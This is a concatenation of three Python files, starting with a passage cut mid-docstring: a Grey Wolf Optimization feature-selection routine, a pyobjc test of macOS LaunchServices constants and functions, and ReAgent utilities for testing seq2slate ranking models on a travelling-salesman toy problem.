- accepts `logging.Logger` instance.
**kwargs
Any extra keyword argument for objective_function
Attributes
----------
best_feature_list : ndarray of shape (n_features)
list of features with the best result of the entire run
"""
super().__init__(
objective_function, n_iteration, timeout, population_size, minimize, logger, **kwargs
)
self.method = method
def _check_params(self, model, x_train, y_train, x_valid, y_valid, method=1):
super()._check_params(model, x_train, y_train, x_valid, y_valid)
if method not in [1, 2]:
            raise ValueError("method accepts only 1 or 2")
def fit(self, model, X_train, y_train, X_valid, y_valid, verbose=True):
"""
Parameters
----------
model : machine learning model's object
machine learning model's object
X_train : pandas.core.frame.DataFrame of shape (n_samples, n_features)
Training input samples to be used for machine learning model
y_train : pandas.core.frame.DataFrame or pandas.core.series.Series of shape (n_samples)
The target values (class labels in classification, real numbers in regression).
X_valid : pandas.core.frame.DataFrame of shape (n_samples, n_features)
Validation input samples
y_valid : pandas.core.frame.DataFrame or pandas.core.series.Series of shape (n_samples)
The target values (class labels in classification, real numbers in regression).
verbose : bool,default=True
Print results for iterations
"""
self._check_params(model, X_train, y_train, X_valid, y_valid, self.method)
self.feature_score_hash = {}
self.feature_list = np.array(list(X_train.columns))
self.best_results_per_iteration = {}
self.best_score = np.inf
self.best_dim = np.ones(X_train.shape[1])
self.initialize_population(X_train)
self.best_score_dimension = np.ones(X_train.shape[1])
self.alpha_wolf_dimension, self.alpha_wolf_fitness = np.ones(X_train.shape[1]), np.inf
self.beta_wolf_dimension, self.beta_wolf_fitness = np.ones(X_train.shape[1]), np.inf
self.delta_wolf_dimension, self.delta_wolf_fitness = np.ones(X_train.shape[1]), np.inf
if self.timeout is not None:
timeout_upper_limit = time.time() + self.timeout
else:
timeout_upper_limit = time.time()
for i in range(self.n_iteration):
            if (self.timeout is not None) and (time.time() > timeout_upper_limit):
                warnings.warn("Timeout occurred")
break
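            # 'a' decays linearly from 2 to 0 over the run, shifting the
            # wolves from exploration towards exploitation.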
a = 2 - 2 * ((i + 1) / self.n_iteration)
self.fitness_scores = self._evaluate_fitness(model, X_train, y_train, X_valid, y_valid)
self.iteration_objective_score_monitor(i)
top_three_fitness_indexes = np.argsort(self.fitness_scores)[:3]
for fit, dim in zip(
np.array(self.fitness_scores)[top_three_fitness_indexes],
self.individuals[top_three_fitness_indexes],
):
if fit < self.alpha_wolf_fitness:
self.delta_wolf_fitness = self.beta_wolf_fitness
self.beta_wolf_fitness = self.alpha_wolf_fitness
self.alpha_wolf_fitness = fit
self.delta_wolf_dimension = self.beta_wolf_dimension
self.beta_wolf_dimension = self.alpha_wolf_dimension
self.alpha_wolf_dimension = dim
continue
if (fit > self.alpha_wolf_fitness) & (fit < self.beta_wolf_fitness):
self.delta_wolf_fitness = self.beta_wolf_fitness
self.beta_wolf_fitness = fit
self.delta_wolf_dimension = self.beta_wolf_dimension
self.beta_wolf_dimension = dim
continue
if (fit > self.beta_wolf_fitness) & (fit < self.delta_wolf_fitness):
self.delta_wolf_fitness = fit
self.delta_wolf_dimension = dim
if (self.method == 1) | (self.method == 2):
C1 = 2 * np.random.random((self.population_size, X_train.shape[1]))
A1 = 2 * a * np.random.random((self.population_size, X_train.shape[1])) - a
d_alpha = abs(C1 * self.alpha_wolf_dimension - self.individuals)
C2 = 2 * np.random.random((self.population_size, X_train.shape[1]))
A2 = 2 * a * np.random.random((self.population_size, X_train.shape[1])) - a
d_beta = abs(C2 * self.beta_wolf_dimension - self.individuals)
C3 = 2 * np.random.random((self.population_size, X_train.shape[1]))
A3 = 2 * a * np.random.random((self.population_size, X_train.shape[1])) - a
d_delta = abs(C3 * self.delta_wolf_dimension - self.individuals)
if self.method == 2:
X1 = abs(self.alpha_wolf_dimension - A1 * d_alpha)
X2 = abs(self.beta_wolf_dimension - A2 * d_beta)
X3 = abs(self.delta_wolf_dimension - A3 * d_delta)
self.individuals = np.where(
np.random.uniform(size=(self.population_size, X_train.shape[1]))
<= self.sigmoid((X1 + X2 + X3) / 3),
1,
0,
)
if self.method == 1:
Y1 = np.where(
(
self.alpha_wolf_dimension
+ np.where(
self.sigmoid(A1 * d_alpha)
> np.random.uniform(size=(self.population_size, X_train.shape[1])),
1,
0,
)
)
>= 1,
1,
0,
)
Y2 = np.where(
(
self.beta_wolf_dimension
+ np.where(
                            self.sigmoid(A2 * d_beta)
> np.random.uniform(size=(self.population_size, X_train.shape[1])),
1,
0,
)
)
>= 1,
1,
0,
)
Y3 = np.where(
(
self.delta_wolf_dimension
+ np.where(
                            self.sigmoid(A3 * d_delta)
> np.random.uniform(size=(self.population_size, X_train.shape[1])),
1,
0,
)
)
>= 1,
1,
0,
)
r = np.random.uniform(size=(self.population_size, X_train.shape[1]))
self.individuals[r < (1 / 3)] = Y1[r < (1 / 3)]
self.individuals[(r >= (1 / 3)) & (r < (2 / 3))] = Y2[
(r >= (1 / 3)) & (r < (2 / 3))
]
self.individuals[r >= (2 / 3)] = Y3[r >= (2 / 3)]
self.verbose_results(verbose, i)
self.best_feature_list = list(self.feature_list[np.where(self.best_dim)[0]])
return self.best_feature_list
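if __name__ == "__main__":
    # Hedged usage sketch (not part of the library): exercises the public
    # fit() API above on a synthetic dataset with a scikit-learn model.
    import pandas as pd
    from sklearn.datasets import make_classification
    from sklearn.linear_model import LogisticRegression
    from sklearn.metrics import accuracy_score

    def objective(model, X_train, y_train, X_valid, y_valid):
        # Train on the candidate feature subset; return a value to minimize.
        model.fit(X_train, y_train)
        return 1.0 - accuracy_score(y_valid, model.predict(X_valid))

    X, y = make_classification(n_samples=300, n_features=20, random_state=0)
    X = pd.DataFrame(X, columns=[f"f{i}" for i in range(X.shape[1])])
    y = pd.Series(y)
    split = 200
    gwo = GreyWolfOptimization(objective, n_iteration=10, population_size=10)
    best = gwo.fit(
        LogisticRegression(max_iter=500),
        X.iloc[:split], y.iloc[:split],
        X.iloc[split:], y.iloc[split:],
        verbose=False,
    )
    print("selected features:", best)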
# ==== ronaldoussoren/pyobjc :: /pyobjc-framework-LaunchServices/PyObjCTest/test_lsinfo.py (MIT) ====
import os
import warnings
from PyObjCTools.TestSupport import TestCase, min_os_level, os_release, os_level_key
import objc
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
import LaunchServices
class TestLSInfo(TestCase):
def setUp(self):
self.path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "dummy.txt"
)
fp = open(self.path, "w")
fp.write("test contents")
fp.close()
self.bpath = self.path.encode("utf-8")
def tearDown(self):
if os.path.exists(self.path):
os.unlink(self.path)
def testConstants(self):
self.assertEqual(LaunchServices.kLSInvalidExtensionIndex, 0xFFFFFFFFFFFFFFFF)
self.assertEqual(LaunchServices.kLSAppInTrashErr, -10660)
self.assertEqual(LaunchServices.kLSExecutableIncorrectFormat, -10661)
self.assertEqual(LaunchServices.kLSAttributeNotFoundErr, -10662)
self.assertEqual(LaunchServices.kLSAttributeNotSettableErr, -10663)
self.assertEqual(LaunchServices.kLSIncompatibleApplicationVersionErr, -10664)
self.assertEqual(LaunchServices.kLSNoRosettaEnvironmentErr, -10665)
self.assertEqual(LaunchServices.kLSUnknownErr, -10810)
self.assertEqual(LaunchServices.kLSNotAnApplicationErr, -10811)
self.assertEqual(LaunchServices.kLSNotInitializedErr, -10812)
self.assertEqual(LaunchServices.kLSDataUnavailableErr, -10813)
self.assertEqual(LaunchServices.kLSApplicationNotFoundErr, -10814)
self.assertEqual(LaunchServices.kLSUnknownTypeErr, -10815)
self.assertEqual(LaunchServices.kLSDataTooOldErr, -10816)
self.assertEqual(LaunchServices.kLSDataErr, -10817)
self.assertEqual(LaunchServices.kLSLaunchInProgressErr, -10818)
self.assertEqual(LaunchServices.kLSNotRegisteredErr, -10819)
self.assertEqual(LaunchServices.kLSAppDoesNotClaimTypeErr, -10820)
self.assertEqual(LaunchServices.kLSAppDoesNotSupportSchemeWarning, -10821)
self.assertEqual(LaunchServices.kLSServerCommunicationErr, -10822)
self.assertEqual(LaunchServices.kLSCannotSetInfoErr, -10823)
self.assertEqual(LaunchServices.kLSNoRegistrationInfoErr, -10824)
self.assertEqual(LaunchServices.kLSIncompatibleSystemVersionErr, -10825)
self.assertEqual(LaunchServices.kLSNoLaunchPermissionErr, -10826)
self.assertEqual(LaunchServices.kLSNoExecutableErr, -10827)
self.assertEqual(LaunchServices.kLSNoClassicEnvironmentErr, -10828)
self.assertEqual(LaunchServices.kLSMultipleSessionsNotSupportedErr, -10829)
self.assertEqual(LaunchServices.kLSInitializeDefaults, 0x00000001)
self.assertEqual(LaunchServices.kLSMinCatInfoBitmap, 6154)
self.assertEqual(LaunchServices.kLSRequestExtension, 0x00000001)
self.assertEqual(LaunchServices.kLSRequestTypeCreator, 0x00000002)
self.assertEqual(LaunchServices.kLSRequestBasicFlagsOnly, 0x00000004)
self.assertEqual(LaunchServices.kLSRequestAppTypeFlags, 0x00000008)
self.assertEqual(LaunchServices.kLSRequestAllFlags, 0x00000010)
self.assertEqual(LaunchServices.kLSRequestIconAndKind, 0x00000020)
self.assertEqual(LaunchServices.kLSRequestExtensionFlagsOnly, 0x00000040)
self.assertEqual(LaunchServices.kLSRequestAllInfo, 0xFFFFFFFF)
self.assertEqual(LaunchServices.kLSItemInfoIsPlainFile, 0x00000001)
self.assertEqual(LaunchServices.kLSItemInfoIsPackage, 0x00000002)
self.assertEqual(LaunchServices.kLSItemInfoIsApplication, 0x00000004)
self.assertEqual(LaunchServices.kLSItemInfoIsContainer, 0x00000008)
self.assertEqual(LaunchServices.kLSItemInfoIsAliasFile, 0x00000010)
self.assertEqual(LaunchServices.kLSItemInfoIsSymlink, 0x00000020)
self.assertEqual(LaunchServices.kLSItemInfoIsInvisible, 0x00000040)
self.assertEqual(LaunchServices.kLSItemInfoIsNativeApp, 0x00000080)
self.assertEqual(LaunchServices.kLSItemInfoIsClassicApp, 0x00000100)
self.assertEqual(LaunchServices.kLSItemInfoAppPrefersNative, 0x00000200)
self.assertEqual(LaunchServices.kLSItemInfoAppPrefersClassic, 0x00000400)
self.assertEqual(LaunchServices.kLSItemInfoAppIsScriptable, 0x00000800)
self.assertEqual(LaunchServices.kLSItemInfoIsVolume, 0x00001000)
self.assertEqual(LaunchServices.kLSItemInfoExtensionIsHidden, 0x00100000)
self.assertEqual(LaunchServices.kLSRolesNone, 0x00000001)
self.assertEqual(LaunchServices.kLSRolesViewer, 0x00000002)
self.assertEqual(LaunchServices.kLSRolesEditor, 0x00000004)
self.assertEqual(LaunchServices.kLSRolesShell, 0x00000008)
        # accept either the 32-bit or 64-bit mask; the third positional
        # argument of assertEqual would otherwise be treated as a message
        self.assertIn(LaunchServices.kLSRolesAll, (0xFFFFFFFF, 0xFFFFFFFFFFFFFFFF))
self.assertEqual(LaunchServices.kLSUnknownKindID, 0)
self.assertEqual(LaunchServices.kLSUnknownType, 0)
self.assertEqual(LaunchServices.kLSUnknownCreator, 0)
self.assertEqual(LaunchServices.kLSAcceptDefault, 0x00000001)
self.assertEqual(LaunchServices.kLSAcceptAllowLoginUI, 0x00000002)
self.assertIsInstance(LaunchServices.kLSItemContentType, str)
self.assertIsInstance(LaunchServices.kLSItemFileType, str)
self.assertIsInstance(LaunchServices.kLSItemFileCreator, str)
self.assertIsInstance(LaunchServices.kLSItemExtension, str)
self.assertIsInstance(LaunchServices.kLSItemDisplayName, str)
self.assertIsInstance(LaunchServices.kLSItemDisplayKind, str)
self.assertIsInstance(LaunchServices.kLSItemRoleHandlerDisplayName, str)
self.assertIsInstance(LaunchServices.kLSItemIsInvisible, str)
self.assertIsInstance(LaunchServices.kLSItemExtensionIsHidden, str)
self.assertIsInstance(LaunchServices.kLSItemQuarantineProperties, str)
self.assertEqual(LaunchServices.kLSHandlerOptionsDefault, 0)
self.assertEqual(LaunchServices.kLSHandlerOptionsIgnoreCreator, 1)
def testStructs(self):
v = LaunchServices.LSItemInfoRecord()
self.assertHasAttr(v, "flags")
self.assertHasAttr(v, "filetype")
self.assertHasAttr(v, "creator")
self.assertHasAttr(v, "extension")
self.assertNotHasAttr(v, "iconFileName")
self.assertNotHasAttr(v, "kindID")
def testFunctions(self):
LaunchServices.LSInit(LaunchServices.kLSInitializeDefaults)
LaunchServices.LSTerm()
url = LaunchServices.CFURLCreateFromFileSystemRepresentation(
None, self.bpath, len(self.bpath), True
)
self.assertIsInstance(url, LaunchServices.CFURLRef)
ok, info = LaunchServices.LSCopyItemInfoForURL(
url,
LaunchServices.kLSRequestExtension | LaunchServices.kLSRequestTypeCreator,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(info, LaunchServices.LSItemInfoRecord)
self.assertArgIsOut(LaunchServices.LSGetExtensionInfo, 2)
ok, info = LaunchServices.LSGetExtensionInfo(len(self.path), self.path, None)
self.assertEqual(ok, 0)
self.assertEqual(info, self.path.rindex(".") + 1)
self.assertArgIsOut(LaunchServices.LSCopyDisplayNameForURL, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyDisplayNameForURL, 1)
ok, info = LaunchServices.LSCopyDisplayNameForURL(url, None)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsBOOL(LaunchServices.LSSetExtensionHiddenForURL, 1)
ok = LaunchServices.LSSetExtensionHiddenForURL(url, True)
self.assertEqual(ok, 0)
self.assertArgIsOut(LaunchServices.LSCopyKindStringForURL, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyKindStringForURL, 1)
ok, info = LaunchServices.LSCopyKindStringForURL(url, None)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsOut(LaunchServices.LSCopyKindStringForTypeInfo, 3)
self.assertArgIsCFRetained(LaunchServices.LSCopyKindStringForTypeInfo, 3)
ok, info = LaunchServices.LSCopyKindStringForTypeInfo(
LaunchServices.kLSUnknownType, LaunchServices.kLSUnknownCreator, "jpg", None
)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsOut(LaunchServices.LSCopyKindStringForMIMEType, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyKindStringForMIMEType, 1)
ok, info = LaunchServices.LSCopyKindStringForMIMEType("text/plain", None)
self.assertIsInstance(ok, int)
# XXX: For some reason this fails sometimes...
# self.assertEqual(ok, 0)
self.assertIsInstance(info, (str, type(None)))
self.assertArgIsOut(LaunchServices.LSGetApplicationForInfo, 4)
self.assertArgIsOut(LaunchServices.LSGetApplicationForInfo, 5)
self.assertArgIsCFRetained(LaunchServices.LSGetApplicationForInfo, 5)
ok, ref, info_url = LaunchServices.LSGetApplicationForInfo(
LaunchServices.kLSUnknownType,
LaunchServices.kLSUnknownCreator,
"txt",
LaunchServices.kLSRolesAll,
None,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(ref, objc.FSRef)
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
self.assertArgIsOut(LaunchServices.LSCopyApplicationForMIMEType, 2)
self.assertArgIsCFRetained(LaunchServices.LSCopyApplicationForMIMEType, 2)
ok, info_url = LaunchServices.LSCopyApplicationForMIMEType(
"text/plain", LaunchServices.kLSRolesAll, None
)
self.assertEqual(ok, 0)
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
self.assertArgIsOut(LaunchServices.LSGetApplicationForURL, 2)
self.assertArgIsOut(LaunchServices.LSGetApplicationForURL, 3)
self.assertArgIsCFRetained(LaunchServices.LSGetApplicationForURL, 3)
ok, ref, info_url = LaunchServices.LSGetApplicationForURL(
url, LaunchServices.kLSRolesAll, None, None
)
self.assertEqual(ok, 0)
self.assertIsInstance(ref, objc.FSRef)
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
self.assertArgIsOut(LaunchServices.LSFindApplicationForInfo, 3)
self.assertArgIsOut(LaunchServices.LSFindApplicationForInfo, 4)
self.assertArgIsCFRetained(LaunchServices.LSFindApplicationForInfo, 4)
ok, ref, info_url = LaunchServices.LSFindApplicationForInfo(
LaunchServices.kLSUnknownCreator, None, "foo.app", None, None
)
# XXX: The code looks correct but fails, however the corresponding C code also fails.
# self.assertEqual(ok, 0)
self.assertIsInstance(ok, int)
if ref is not None:
self.assertIsInstance(ref, objc.FSRef)
if info_url is not None:
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
self.assertArgIsOut(LaunchServices.LSCanURLAcceptURL, 4)
ok, status = LaunchServices.LSCanURLAcceptURL(
url, url, LaunchServices.kLSRolesAll, LaunchServices.kLSAcceptDefault, None
)
self.assertIsInstance(ok, int)
self.assertIsInstance(status, bool)
ok = LaunchServices.LSRegisterURL(url, False)
self.assertIsInstance(ok, int)
v = LaunchServices.LSCopyApplicationURLsForURL(url, LaunchServices.kLSRolesAll)
self.assertIsInstance(v, LaunchServices.CFArrayRef)
for a in v:
self.assertIsInstance(a, LaunchServices.CFURLRef)
default_role = LaunchServices.LSCopyDefaultRoleHandlerForContentType(
"public.plain-text", LaunchServices.kLSRolesAll
)
if os_level_key(os_release()) < os_level_key("10.7"):
if default_role is not None:
self.assertIsInstance(default_role, str)
else:
self.assertIsInstance(default_role, str)
v = LaunchServices.LSCopyAllRoleHandlersForContentType(
"public.plain-text", LaunchServices.kLSRolesAll
)
self.assertIsInstance(v, LaunchServices.CFArrayRef)
for a in v:
self.assertIsInstance(a, str)
ok = LaunchServices.LSSetDefaultRoleHandlerForContentType(
"public.plain-text", LaunchServices.kLSRolesAll, default_role
)
self.assertIsInstance(ok, int)
v = LaunchServices.LSGetHandlerOptionsForContentType("public.plain-text")
self.assertIsInstance(v, int)
ok = LaunchServices.LSSetHandlerOptionsForContentType("public.plain-text", v)
self.assertIsInstance(ok, int)
self.assertResultIsCFRetained(LaunchServices.LSCopyDefaultHandlerForURLScheme)
default_handler = LaunchServices.LSCopyDefaultHandlerForURLScheme("http")
if os_level_key(os_release()) < os_level_key("10.7"):
if default_handler is not None:
self.assertIsInstance(default_handler, str)
else:
self.assertIsInstance(default_handler, str)
self.assertResultIsCFRetained(LaunchServices.LSCopyAllHandlersForURLScheme)
v = LaunchServices.LSCopyAllHandlersForURLScheme("http")
self.assertIsInstance(v, LaunchServices.CFArrayRef)
for a in v:
self.assertIsInstance(a, str)
ok = LaunchServices.LSSetDefaultHandlerForURLScheme("http", default_handler)
self.assertIsInstance(ok, int)
def testFSRef(self):
ref = objc.FSRef.from_pathname(self.path)
self.assertIsInstance(ref, objc.FSRef)
ok, info = LaunchServices.LSCopyItemInfoForRef(
ref,
LaunchServices.kLSRequestExtension | LaunchServices.kLSRequestTypeCreator,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(info, LaunchServices.LSItemInfoRecord)
self.assertArgIsOut(LaunchServices.LSCopyDisplayNameForRef, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyDisplayNameForRef, 1)
ok, info = LaunchServices.LSCopyDisplayNameForRef(ref, None)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsBOOL(LaunchServices.LSSetExtensionHiddenForRef, 1)
ok = LaunchServices.LSSetExtensionHiddenForRef(ref, True)
self.assertEqual(ok, 0)
self.assertArgIsOut(LaunchServices.LSCopyKindStringForRef, 1)
self.assertArgIsCFRetained(LaunchServices.LSCopyKindStringForRef, 1)
ok, info = LaunchServices.LSCopyKindStringForRef(ref, None)
self.assertEqual(ok, 0)
self.assertIsInstance(info, str)
self.assertArgIsOut(LaunchServices.LSGetApplicationForItem, 2)
self.assertArgIsOut(LaunchServices.LSGetApplicationForItem, 3)
self.assertArgIsCFRetained(LaunchServices.LSGetApplicationForItem, 3)
ok, info_ref, info_url = LaunchServices.LSGetApplicationForItem(
ref, LaunchServices.kLSRolesAll, None, None
)
self.assertEqual(ok, 0)
self.assertIsInstance(info_ref, objc.FSRef)
self.assertIsInstance(info_url, LaunchServices.CFURLRef)
if os.path.exists("/Applications/TextEdit.app"):
app_ref = objc.FSRef.from_pathname("/Applications/TextEdit.app")
else:
app_ref = objc.FSRef.from_pathname("/System/Applications/TextEdit.app")
self.assertArgIsOut(LaunchServices.LSCanRefAcceptItem, 4)
ok, accepts = LaunchServices.LSCanRefAcceptItem(
ref,
app_ref,
LaunchServices.kLSRolesAll,
LaunchServices.kLSAcceptDefault,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(accepts, bool)
ok = LaunchServices.LSRegisterFSRef(ref, False)
self.assertIsInstance(ok, int)
self.assertArgHasType(LaunchServices.LSCopyItemAttribute, 3, b"o^@")
ok, value = LaunchServices.LSCopyItemAttribute(
ref,
LaunchServices.kLSRolesAll,
LaunchServices.kLSItemExtensionIsHidden,
None,
)
self.assertEqual(ok, 0)
self.assertIsInstance(value, bool)
ok = LaunchServices.LSSetItemAttribute(
ref,
LaunchServices.kLSRolesAll,
LaunchServices.kLSItemRoleHandlerDisplayName,
"foo",
)
self.assertIsInstance(ok, int)
@min_os_level("10.10")
def testFunctions10_10(self):
self.assertResultIsCFRetained(LaunchServices.LSCopyDefaultApplicationURLForURL)
self.assertArgIsOut(LaunchServices.LSCopyDefaultApplicationURLForURL, 2)
self.assertResultIsCFRetained(
LaunchServices.LSCopyDefaultApplicationURLForContentType
)
self.assertArgIsOut(LaunchServices.LSCopyDefaultApplicationURLForContentType, 2)
self.assertResultIsCFRetained(
LaunchServices.LSCopyApplicationURLsForBundleIdentifier
)
self.assertArgIsOut(LaunchServices.LSCopyApplicationURLsForBundleIdentifier, 1)
# ==== facebookresearch/ReAgent :: /reagent/test/ranking/seq2slate_utils.py (BSD-3-Clause) ====
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import logging
import math
import tempfile
from itertools import permutations
import pytorch_lightning as pl
import reagent.core.types as rlt
import torch
import torch.nn as nn
from reagent.core.parameters import Seq2SlateParameters
from reagent.core.parameters_seq2slate import LearningMethod, SimulationParameters
from reagent.core.torch_utils import gather
from reagent.model_utils.seq2slate_utils import Seq2SlateOutputArch
from reagent.models.seq2slate import Seq2SlateMode, Seq2SlateTransformerNet
from reagent.optimizer.union import Optimizer__Union
from reagent.training.ranking.seq2slate_sim_trainer import Seq2SlateSimulationTrainer
from reagent.training.ranking.seq2slate_trainer import Seq2SlateTrainer
from torch.utils.data import DataLoader
logger = logging.getLogger(__name__)
MODEL_TRANSFORMER = "transformer"
ON_POLICY = "on_policy"
OFF_POLICY = "off_policy"
SIMULATION = "simulation"
class TSPRewardModel(nn.Module):
def forward(self, state, candidates, ranked_cities, src_src_mask, tgt_out_idx):
reward = compute_reward(ranked_cities)
# negate because we want to minimize
return -reward
def post_preprocess_batch(seq2slate_net, candidate_num, batch, device, epoch):
model_propensity, model_action, reward = rank_on_policy_and_eval(
seq2slate_net, batch, candidate_num, greedy=False
)
batch = rlt.PreprocessedRankingInput.from_input(
state=batch.state.float_features,
candidates=batch.src_seq.float_features,
device=device,
action=model_action,
logged_propensities=model_propensity,
# negate because we want to minimize
slate_reward=-reward,
)
logger.info(f"Epoch {epoch} mean on_policy reward: {torch.mean(reward)}")
logger.info(f"Epoch {epoch} mean model_propensity: {torch.mean(model_propensity)}")
return batch
class Seq2SlateOnPolicyTrainer(Seq2SlateTrainer):
def on_train_batch_start(self, batch, batch_idx, dataloader_idx):
new_batch = post_preprocess_batch(
self.seq2slate_net,
self.seq2slate_net.max_src_seq_len,
batch,
batch.state.float_features.device,
self.current_epoch,
)
for attr in dir(new_batch):
if not callable(getattr(new_batch, attr)) and not attr.startswith("__"):
setattr(batch, attr, getattr(new_batch, attr))
super().on_train_batch_start(batch, batch_idx, dataloader_idx)
def create_trainer(
seq2slate_net,
learning_method,
batch_size,
learning_rate,
policy_gradient_interval,
device,
):
if learning_method == ON_POLICY:
seq2slate_params = Seq2SlateParameters(
on_policy=True, learning_method=LearningMethod.REINFORCEMENT_LEARNING
)
trainer_cls = Seq2SlateOnPolicyTrainer
elif learning_method == OFF_POLICY:
seq2slate_params = Seq2SlateParameters(
on_policy=False,
learning_method=LearningMethod.REINFORCEMENT_LEARNING,
)
trainer_cls = Seq2SlateTrainer
elif learning_method == SIMULATION:
temp_reward_model_path = tempfile.mkstemp(suffix=".pt")[1]
reward_model = torch.jit.script(TSPRewardModel())
torch.jit.save(reward_model, temp_reward_model_path)
seq2slate_params = Seq2SlateParameters(
on_policy=True,
learning_method=LearningMethod.SIMULATION,
simulation=SimulationParameters(
reward_name_weight={"tour_length": 1.0},
reward_name_power={"tour_length": 1.0},
reward_name_path={"tour_length": temp_reward_model_path},
),
)
trainer_cls = Seq2SlateSimulationTrainer
param_dict = {
"seq2slate_net": seq2slate_net,
"params": seq2slate_params,
"policy_optimizer": Optimizer__Union.default(lr=learning_rate),
"print_interval": 1,
"policy_gradient_interval": policy_gradient_interval,
}
return trainer_cls(**param_dict)
def create_seq2slate_net(
model_str,
candidate_num,
candidate_dim,
hidden_size,
output_arch,
temperature,
device,
):
if model_str == MODEL_TRANSFORMER:
return Seq2SlateTransformerNet(
state_dim=1,
candidate_dim=candidate_dim,
num_stacked_layers=2,
num_heads=2,
dim_model=hidden_size,
dim_feedforward=hidden_size,
max_src_seq_len=candidate_num,
max_tgt_seq_len=candidate_num,
output_arch=output_arch,
temperature=temperature,
state_embed_dim=1,
).to(device)
else:
raise NotImplementedError(f"unknown model type {model_str}")
FIX_CANDIDATES = None
@torch.no_grad()
def create_batch(
batch_size,
candidate_num,
candidate_dim,
device,
learning_method,
diverse_input=False,
):
# fake state, we only use candidates
state = torch.zeros(batch_size, 1)
if diverse_input:
# city coordinates are spread in [0, 4]
candidates = torch.randint(
5, (batch_size, candidate_num, candidate_dim)
).float()
else:
        # every training batch uses the same set of cities as input
global FIX_CANDIDATES
if FIX_CANDIDATES is None or FIX_CANDIDATES.shape != (
batch_size,
candidate_num,
candidate_dim,
):
candidates = torch.randint(
5, (batch_size, candidate_num, candidate_dim)
).float()
candidates[1:] = candidates[0]
FIX_CANDIDATES = candidates
else:
candidates = FIX_CANDIDATES
batch_dict = {
"state": state,
"candidates": candidates,
"device": device,
}
if learning_method == OFF_POLICY:
# using data from a uniform sampling policy
action = torch.stack([torch.randperm(candidate_num) for _ in range(batch_size)])
propensity = torch.full((batch_size, 1), 1.0 / math.factorial(candidate_num))
ranked_cities = gather(candidates, action)
reward = compute_reward(ranked_cities)
batch_dict["action"] = action
batch_dict["logged_propensities"] = propensity
batch_dict["slate_reward"] = -reward
batch = rlt.PreprocessedRankingInput.from_input(**batch_dict)
logger.info("Generate one batch")
return batch
def create_train_and_test_batches(
batch_size,
candidate_num,
candidate_dim,
device,
num_train_batches,
learning_method,
diverse_input,
):
train_batches = [
create_batch(
batch_size,
candidate_num,
candidate_dim,
device,
learning_method,
diverse_input=diverse_input,
)
for _ in range(num_train_batches)
]
if diverse_input:
test_batch = create_batch(
batch_size,
candidate_num,
candidate_dim,
device,
learning_method,
diverse_input=diverse_input,
)
else:
test_batch = train_batches[0]
return train_batches, test_batch
def compute_reward(ranked_cities):
assert len(ranked_cities.shape) == 3
ranked_cities_offset = torch.roll(ranked_cities, shifts=1, dims=1)
return (
torch.sqrt(((ranked_cities_offset - ranked_cities) ** 2).sum(-1))
.sum(-1)
.unsqueeze(1)
)
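# Hedged worked example (not from the original source): for a single batch
# containing the four corners of the unit square, the closed tour length is 4:
#
#   cities = torch.tensor([[[0., 0.], [0., 1.], [1., 1.], [1., 0.]]])
#   compute_reward(cities)  # -> tensor([[4.]])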
def compute_best_reward(input_cities):
batch_size, candidate_num, _ = input_cities.shape
all_perm = torch.tensor(
list(permutations(torch.arange(candidate_num), candidate_num))
)
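    # NOTE: this enumerates all candidate_num! permutations, so it is only
    # tractable for small candidate_num.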
res = [
compute_reward(gather(input_cities, perm.repeat(batch_size, 1)))
for perm in all_perm
]
# res shape: batch_size, num_perm
res = torch.cat(res, dim=1)
best_possible_reward = torch.min(res, dim=1).values
best_possible_reward_mean = torch.mean(best_possible_reward)
return best_possible_reward_mean
@torch.no_grad()
def rank_on_policy(
model, batch: rlt.PreprocessedRankingInput, tgt_seq_len: int, greedy: bool
):
model.eval()
rank_output = model(
batch, mode=Seq2SlateMode.RANK_MODE, tgt_seq_len=tgt_seq_len, greedy=greedy
)
ranked_slate_prob = rank_output.ranked_per_seq_probs
ranked_order = rank_output.ranked_tgt_out_idx - 2
model.train()
return ranked_slate_prob, ranked_order
@torch.no_grad()
def rank_on_policy_and_eval(
seq2slate_net, batch: rlt.PreprocessedRankingInput, tgt_seq_len: int, greedy: bool
):
model_propensity, model_action = rank_on_policy(
seq2slate_net, batch, tgt_seq_len, greedy=greedy
)
ranked_cities = gather(batch.src_seq.float_features, model_action)
reward = compute_reward(ranked_cities)
return model_propensity, model_action, reward
def run_seq2slate_tsp(
model_str,
batch_size,
epochs,
candidate_num,
num_batches,
hidden_size,
diverse_input,
learning_rate,
expect_reward_threshold,
learning_method,
policy_gradient_interval,
device,
):
pl.seed_everything(0)
candidate_dim = 2
eval_sample_size = 1
train_batches, test_batch = create_train_and_test_batches(
batch_size,
candidate_num,
candidate_dim,
device,
num_batches,
learning_method,
diverse_input,
)
best_test_possible_reward = compute_best_reward(test_batch.src_seq.float_features)
seq2slate_net = create_seq2slate_net(
model_str,
candidate_num,
candidate_dim,
hidden_size,
Seq2SlateOutputArch.AUTOREGRESSIVE,
1.0,
device,
)
trainer = create_trainer(
seq2slate_net,
learning_method,
batch_size,
learning_rate,
policy_gradient_interval,
device,
)
def evaluate():
best_test_reward = torch.full((batch_size,), 1e9).to(device)
for _ in range(eval_sample_size):
model_propensities, _, reward = rank_on_policy_and_eval(
seq2slate_net.to(device), test_batch, candidate_num, greedy=True
)
best_test_reward = torch.where(
reward < best_test_reward, reward, best_test_reward
)
logger.info(
f"Test mean model_propensities {torch.mean(model_propensities)}, "
f"Test mean reward: {torch.mean(best_test_reward)}, "
f"best possible reward {best_test_possible_reward}"
)
if torch.any(torch.isnan(model_propensities)):
raise Exception("Model propensities contain NaNs")
